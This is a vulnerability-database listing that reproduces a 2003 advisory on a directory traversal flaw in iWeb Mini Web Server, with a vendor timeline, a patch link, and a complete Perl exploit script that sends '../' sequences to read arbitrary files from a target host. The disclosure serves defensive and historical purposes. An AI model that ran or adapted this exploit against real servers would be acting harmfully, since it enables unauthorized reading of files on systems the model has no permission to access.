Lucene search

K

SFAD03-001.txt

🗓️ 16 Apr 2003 00:00:00Reported by subversiveType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

iWeb Mini Web Server allows remote directory traversal via improper GET request filtering.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
[=================================================================]  
[...............:[ S e c u r i t y F r e a k s ]:...............]  
[.................:[ www.securityfreaks.com ]:..................]  
[=================================================================]  
  
  
  
  
Title : iWeb Mini Web Server Remote Directory Traversal  
Risk : Moderate  
Software : iWeb Mini Web Server  
Platforms : Windows NT/XP/9x  
Vendor URL : http://www.ashleybrown.co.uk/iweb/  
Discovered by : subversive <[email protected]>  
Advisory ID : SFAD03-001  
  
  
  
  
.....:[ Overview :  
  
  
The iWeb Mini Web Server is a mini web server designed for use on  
Intranets and for testing websites in a realistic environment.  
  
  
  
.....:[ Details :  
  
iWeb does not correctly filter GET requests for ../ characters  
thereby allowing us to escape the webroot and remotely traverse  
the directory structure of the remote host.  
  
  
  
.....:[ Vendor Status :  
  
14/04/03 Initial Contact Made  
15/04/03 Vendor Responded  
15/04/03 Vendor Released Updated Version  
  
  
  
.....:[ Solution :  
  
Remove old iWeb application and download and install the updated  
version which can be found at:  
  
http://ashleybrown.co.uk/downloads/iws2.exe  
  
  
  
.....:[ Exploit - SF-iwsuk.pl :  
  
#!/usr/bin/perl -w  
#  
# S e c u r i t y F r e a k s  
# www.securityfreaks.com  
#  
# iWeb Mini Web Server Remote Directory Traversal  
#  
# subversive[at]linuxmail.org - *15/04/2003*  
  
  
use IO::Socket;  
  
if(!$ARGV[0]) {  
print <<"IWEBSUK";  
  
S e c u r i t y F r e a k s  
www.securityfreaks.com  
  
-------------------------------------------------------------  
SF-iwsuk.pl - iWeb Mini Web Server Remote Directory Traversal  
-------------------------------------------------------------  
Usage: $0 <host> <file> <port>  
  
  
IWEBSUK  
exit;  
}  
  
else{  
$host = $ARGV[0];  
}   
  
if(!$ARGV[2]) {  
$port = "80";  
}  
  
else {  
$port = $ARGV[2];  
}  
  
  
my $sock = new IO::Socket::INET ( Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
);  
die "\nConnection to $host:$port failed\n" unless $sock;  
  
print $sock "GET /../../../../../../../../../$ARGV[1] HTTP/1.0\n\n";  
while(<$sock>) { print }  
close($sock);  
print("\n\n");  
exit;  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
16 Apr 2003 00:00Current
7.4High risk
Vulners AI Score7.4
18
.json
Report